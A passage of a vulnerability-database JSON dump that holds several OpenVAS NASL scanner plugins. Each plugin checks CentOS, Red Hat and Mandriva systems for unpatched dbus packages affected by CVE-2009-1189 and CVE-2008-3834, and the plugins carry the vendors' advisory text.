centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for dbus CESA-2010:0018 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"D-Bus is a system for sending messages between applications. It is used for\n the system-wide message bus service and as a per-user-login-session\n messaging facility.\n\n It was discovered that the Red Hat Security Advisory RHSA-2009:0008 did\n not correctly fix the denial of service flaw in the system for sending\n messages between applications. A local user could use this flaw to send a\n message with a malformed signature to the bus, causing the bus (and,\n consequently, any process using libdbus to receive messages) to abort.\n (CVE-2009-1189)\n \n Note: Users running any application providing services over the system\n message bus are advised to test this update carefully before deploying it\n in production environments.\n \n All users are advised to upgrade to these updated packages, which contain a\n backported patch to correct this issue. For the update to take effect, all\n running instances of dbus-daemon and all running applications using the\n libdbus library must be restarted, or the system rebooted.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"dbus on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-January/016433.html\");\n script_id(880595);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2010:0018\");\n script_cve_id(\"CVE-2009-1189\", \"CVE-2008-3834\");\n script_name(\"CentOS Update for dbus CESA-2010:0018 centos5 i386\");\n\n script_summary(\"Check for the Version of dbus\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-devel\", rpm:\"dbus-devel~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-libs\", rpm:\"dbus-libs~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256.", "modified": "2017-07-06T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:65733", "href": "http://plugins.openvas.org/nasl.php?oid=65733", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:256 (dbus)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_256.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:256 (dbus)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was discovered and corrected in dbus:\n\nThe _dbus_validate_signature_with_reason function\n(dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic\nto validate a basic type, which allows remote attackers to spoof a\nsignature via a crafted key. NOTE: this is due to an incorrect fix\nfor CVE-2008-3834 (CVE-2009-1189).\n\nThis update provides a fix for this vulnerability.\n\nAffected: 2008.1, 2009.0, Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:256\";\ntag_summary = \"The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256.\";\n\n \n\nif(description)\n{\n script_id(65733);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:256 (dbus)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1-devel\", rpm:\"libdbus-1-devel~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1-devel\", rpm:\"lib64dbus-1-devel~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1-devel\", rpm:\"libdbus-1-devel~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1-devel\", rpm:\"lib64dbus-1-devel~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1-devel\", rpm:\"libdbus-1-devel~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1-devel\", rpm:\"lib64dbus-1-devel~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256-1.", "modified": "2018-04-06T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:136141256231066422", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066422", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:256-1 (dbus)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_256_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:256-1 (dbus)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was discovered and corrected in dbus:\n\nThe _dbus_validate_signature_with_reason function\n(dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic\nto validate a basic type, which allows remote attackers to spoof a\nsignature via a crafted key. NOTE: this is due to an incorrect fix\nfor CVE-2008-3834 (CVE-2009-1189).\n\nThis update provides a fix for this vulnerability.\n\nUpdate:\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:256-1\";\ntag_summary = \"The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256-1.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66422\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:256-1 (dbus)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3-devel\", rpm:\"libdbus-1_3-devel~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3-devel\", rpm:\"lib64dbus-1_3-devel~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880595", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880595", "type": "openvas", "title": "CentOS Update for dbus CESA-2010:0018 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for dbus CESA-2010:0018 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2010-January/016433.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880595\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2010:0018\");\n script_cve_id(\"CVE-2009-1189\", \"CVE-2008-3834\");\n script_name(\"CentOS Update for dbus CESA-2010:0018 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dbus'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"dbus on CentOS 5\");\n script_tag(name:\"insight\", value:\"D-Bus is a system for sending messages between applications. It is used for\n the system-wide message bus service and as a per-user-login-session\n messaging facility.\n\n It was discovered that the Red Hat Security Advisory RHSA-2009:0008 did\n not correctly fix the denial of service flaw in the system for sending\n messages between applications. A local user could use this flaw to send a\n message with a malformed signature to the bus, causing the bus (and,\n consequently, any process using libdbus to receive messages) to abort.\n (CVE-2009-1189)\n\n Note: Users running any application providing services over the system\n message bus are advised to test this update carefully before deploying it\n in production environments.\n\n All users are advised to upgrade to these updated packages, which contain a\n backported patch to correct this issue. For the update to take effect, all\n running instances of dbus-daemon and all running applications using the\n libdbus library must be restarted, or the system rebooted.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-devel\", rpm:\"dbus-devel~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-libs\", rpm:\"dbus-libs~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.1.2~12.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2018-01-23T13:05:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "Check for the Version of dbus", "modified": "2018-01-23T00:00:00", "published": "2010-01-15T00:00:00", "id": "OPENVAS:1361412562310870201", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870201", "type": "openvas", "title": "RedHat Update for dbus RHSA-2010:0018-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for dbus RHSA-2010:0018-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"D-Bus is a system for sending messages between applications. It is used for\n the system-wide message bus service and as a per-user-login-session\n messaging facility.\n\n It was discovered that the Red Hat Security Advisory RHSA-2009:0008 did\n not correctly fix the denial of service flaw in the system for sending\n messages between applications. A local user could use this flaw to send a\n message with a malformed signature to the bus, causing the bus (and,\n consequently, any process using libdbus to receive messages) to abort.\n (CVE-2009-1189)\n \n Note: Users running any application providing services over the system\n message bus are advised to test this update carefully before deploying it\n in production environments.\n \n All users are advised to upgrade to these updated packages, which contain a\n backported patch to correct this issue. For the update to take effect, all\n running instances of dbus-daemon and all running applications using the\n libdbus library must be restarted, or the system rebooted.\";\n\ntag_affected = \"dbus on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-January/msg00003.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870201\");\n script_version(\"$Revision: 8495 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 08:57:49 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0018-01\");\n script_cve_id(\"CVE-2009-1189\", \"CVE-2008-3834\");\n script_name(\"RedHat Update for dbus RHSA-2010:0018-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of dbus\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-debuginfo\", rpm:\"dbus-debuginfo~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-devel\", rpm:\"dbus-devel~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-libs\", rpm:\"dbus-libs~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256-1.", "modified": "2017-07-06T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:66422", "href": "http://plugins.openvas.org/nasl.php?oid=66422", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:256-1 (dbus)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_256_1.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:256-1 (dbus)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was discovered and corrected in dbus:\n\nThe _dbus_validate_signature_with_reason function\n(dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic\nto validate a basic type, which allows remote attackers to spoof a\nsignature via a crafted key. NOTE: this is due to an incorrect fix\nfor CVE-2008-3834 (CVE-2009-1189).\n\nThis update provides a fix for this vulnerability.\n\nUpdate:\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:256-1\";\ntag_summary = \"The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256-1.\";\n\n \n\nif(description)\n{\n script_id(66422);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:256-1 (dbus)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", 